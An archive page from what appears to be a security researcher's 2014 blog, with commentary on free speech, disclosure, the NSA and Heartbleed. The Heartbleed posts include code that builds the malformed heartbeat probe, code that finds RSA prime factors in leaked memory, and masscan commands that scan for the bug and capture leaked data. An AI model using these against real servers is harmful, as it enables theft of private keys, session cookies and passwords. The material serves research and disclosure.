Friday, April 18, 2014

xkcd is wrong about "free speech"

The usually awesome XKCD cartoon opines that "the right to free speech means only that the government cannot arrest you for what you say". This is profoundly wrong in every way that something can be wrong.

The First Amendment to the Constitution says that "Congress shall make no law ... abridging the freedom of speech". This wording is important. It doesn't say that Congress shall pass laws protecting our speech, but that Congress shall not abridge it. "Free speech" is not a right given to us by government. Instead, "free speech" is a right we have -- the stipulation is only that government should not infringe it.

The forces that want to restrict your speech include more than just government. For example, cartoonists around the world draw pictures of Jesus and Buddha, but do not draw pictures of Mohamed, because they are afraid of being murdered by Islamic fundamentalists. South Park depicted Jesus as addicted to Internet porn, and Buddha with a cocaine habit, but the censors forced them to cover up a totally innocuous picture of Mohamed. It's a free-speech issue, but not one that involves government.

In oppressive countries like Russia, the threats to speech rarely come directly from the government. It's not the police arresting people for speech. Instead, it's the local young thugs beating up journalists, with the police looking the other way.

In the United States, society has gone overboard on "political correctness" that silences speech. A good example in the cybersec community is when the "Ada Initiative" got that talk canceled at "BSidesSF" last year. That sort of thing is very much a "free speech" issue, even though the official government wasn't involved.

The "responsible-disclosure" debate is about "free-speech", where some try to use the hammer of "ethical behavior" to control speech. Last night I tweeted a line of code from the OpenSSL source code that demonstrates a hilariously funny bug. I was attacked for my speech by OpenSSL defenders who want me to quietly submit bug patches rather than making OpenSSL look bad on Twitter.

That's why so many of us oppose the idea of "responsible-disclosure" -- the principle of "free-speech" means "free-disclosure". If you've found a vulnerability, keep it secret, sell it, notify the vendor, notify the press, do whatever the heck you want to do with it. Only "free-disclosure" advances security -- "responsible" disclosure that tries to control the process holds back security.

Such debates do circle back to government. For example, in the Andrew 'weev' Auernheimer case, the government cited Andrew's behavior (notifying the press) as an example of irresponsible behavior, because it didn't fit within the white-hat security norms of "responsible-disclosure". Andrew was sent to jail for speech that embarrassed the powerful -- and it was your anti-free-speech arguments of "responsible-disclosure" that helped put him there.


Certainly, it's technically inaccurate to cite "First Amendment" rights universally, as that's only a restriction on government. But "free speech" is distinct: you can certainly cite your "right to free speech" in cases that have nothing to do with government.


Update: I shoulda just started this post by citing the Wikipedia entry on rights: "Rights are legal, social, or ethical principles of freedom". In other words, it's perfectly valid to use the word "right" in contexts other than "legal".

Update: I mention South Park because the XKCD mentions "when your show gets canceled". If your show gets canceled because nobody watches it, then that's certainly not a free-speech issue. But, when your show gets canceled because of threats from Islamists, then it certainly is a free-speech issue.

Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two days trying to solve this problem, and it was very frustrating.

The answer was "byte-order". I was looking for the prime factor in the same way that it'd appear in a DER-encoded file, which is "big-endian". Instead, the way to find the key in memory is to look for it in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. An RSA key and its constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.
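That layout is easy to sketch. The following is a toy model of the general idea, not OpenSSL's actual code: on a little-endian machine, the limb array as it sits in memory is exactly the byte-reversal of the big-endian form found in a DER file.

```python
def to_limbs(n, word_bits=64):
    """Split an integer into word-sized limbs, least-significant limb first."""
    mask = (1 << word_bits) - 1
    limbs = []
    while n:
        limbs.append(n & mask)
        n >>= word_bits
    return limbs or [0]

def memory_bytes_x86(n, word_bits=64):
    """Lay the limbs out as a little-endian CPU stores them in memory."""
    return b"".join(l.to_bytes(word_bits // 8, "little")
                    for l in to_limbs(n, word_bits))

n = 0x0123456789ABCDEFFEDCBA9876543210        # a 128-bit example value
# In-memory bytes on x86 are the DER (big-endian) bytes, fully reversed
assert memory_bytes_x86(n) == n.to_bytes(16, "big")[::-1]
```

On a big-endian SPARC, each limb's bytes would be stored most-significant first, so only the limb order, not every individual byte, would be reversed.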

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudflarechallenge.com challenge using Python scripts. I therefore assumed that Python used an external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER-encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.
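In outline, the search itself is simple. Here's a hypothetical sketch with toy numbers; a real run would use a prime_len of half the modulus size (128 bytes for RSA-2048) against a multi-gigabyte dump:

```python
def find_prime_factor(dump: bytes, n: int, prime_len: int):
    """Slide over a memory dump, interpreting each window as a little-endian
    integer, and test whether it is a non-trivial factor of the modulus n."""
    for i in range(len(dump) - prime_len + 1):
        p = int.from_bytes(dump[i:i + prime_len], "little")
        if 1 < p < n and n % p == 0:
            return p
    return None

# Toy demonstration: n = 1009 * 1013, with 1009 hidden little-endian in junk
dump = b"\xaa\xbb" + (1009).to_bytes(2, "little") + b"\xcc"
assert find_prime_factor(dump, 1009 * 1013, prime_len=2) == 1009
```

The only thing the byte-order bug changes in this sketch is the single word "little" -- which is exactly why it took two frustrating days to find.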



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get its key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than the one commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former Defense Secretary Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but that they stay on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market are less than those caused by private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has crept to include surveilling American citizens. We need to stop making them the bogeyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue, not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for heartbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.
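For reference, the probe itself is tiny. Here's a sketch of the kind of record these scanners dump on the wire -- this is the widely published TLS 1.1 heartbeat request; an actual scanner also sends a ClientHello first and waits for the handshake messages:

```python
import struct

def heartbeat_request(tls_version=(3, 2), claimed_len=0x4000):
    """Build a TLS heartbeat record whose claimed payload length (here 16KB)
    is far larger than the zero bytes of payload actually sent."""
    # Record header: content type 24 (heartbeat), version, record length 3
    record = struct.pack("!BBBH", 24, tls_version[0], tls_version[1], 3)
    # Heartbeat message: type 1 (request), payload_length field, no payload
    record += struct.pack("!BH", 1, claimed_len)
    return record

assert heartbeat_request() == b"\x18\x03\x02\x00\x03\x01\x40\x00"
```

A vulnerable server echoes back roughly claimed_len bytes of its own memory; the scanner just pattern-matches that oversized response, then drops the connection.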

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same error messages might make it seem like they are correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are not so likely to be exposed, but much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of the machines with heartbeats enabled had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.
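For what it's worth, the arithmetic behind those figures:

```python
valid_ssl  = 28_581_134   # machines answering with a valid SSL connection
vulnerable =    615_268   # responded to the heartbleed attack
heartbeat  =    330_531   # heartbeats enabled, but not vulnerable

# The "2%" figure people quote
print(f"{vulnerable / valid_ssl:.1%} of SSL hosts vulnerable")
# The "a third had been patched" figure
print(f"{heartbeat / (vulnerable + heartbeat):.0%} of heartbeat hosts patched")
```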

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, and I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the entire Internet).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in response to the SYN-ACKs masscan receives. Therefore, on Linux, you have to either configure firewall rules to block the range of ports masscan uses, so the kernel doesn't generate resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100,000 packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that SSL exists, meaning the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).
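If you're feeding this output into a script, the lines are easy to pattern-match. A hypothetical helper (not part of masscan itself) to pull out the vulnerable IP addresses:

```python
import re

# Matches the "[vuln] ... SSL[HEARTBLEED]" banner lines shown above
HEARTBLEED = re.compile(
    r"Banner on port \d+/tcp on (\S+): \[vuln\].*SSL\[HEARTBLEED\]")

def vulnerable_ips(lines):
    """Extract the IP address from each HEARTBLEED vulnerability line."""
    return [m.group(1) for line in lines if (m := HEARTBLEED.search(line))]

output = [
    "Discovered open port 443/tcp on 10.20.30.143",
    "Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014",
    "Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]",
]
assert vulnerable_ips(output) == ["10.20.30.143"]
```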

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).




What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, affecting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: the impact of disclosing the private-key affects all hundred million customers with a one-in-a-million likelihood, whereas the impact of a session-key disclosure affects only one customer, with a greater than 50% chance per connection.
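To put a number on "millions of connections": even at the assumed one-in-a-million odds, the expected effort for an attacker is tiny (both figures below are illustrative assumptions, not measurements):

```python
p_key = 1e-6   # assumed per-connection chance of the key material leaking
rate  = 1000   # heartbeat requests per second an attacker can sustain

expected_connections = 1 / p_key            # about a million tries on average
minutes = expected_connections / rate / 60
print(f"~{minutes:.0f} minutes of hammering")   # roughly a quarter hour
```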




Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is that there were far fewer security problems, that we knew of, in 1995 than today. What is so different about today than 1995? One major difference is that SATAN is not as widely used -- the controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Our first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...

Thursday, March 27, 2014

A traditional cybersecurity company

Picture of the loft, from Space Rogue.
This is the tradition.
In the prosecutors' response to the Weev appeal, they make the snarky claim about Goatse security:
It is not, to put it mildly, a traditional security research company. The firm’s name is a reference to a notoriously obscene internet shock site. ...  Goatse Security’s corporate motto is “gaping holes exposed.” 
They are wrong. This is traditional, at least for security research companies. We start out as hobbyists having fun, not taking what we do seriously. We start out wearing t-shirts and hoodies. Only as we grow older do we realize that people will pay serious money for this, and it becomes our formal job, where we might show up to meetings wearing a suit.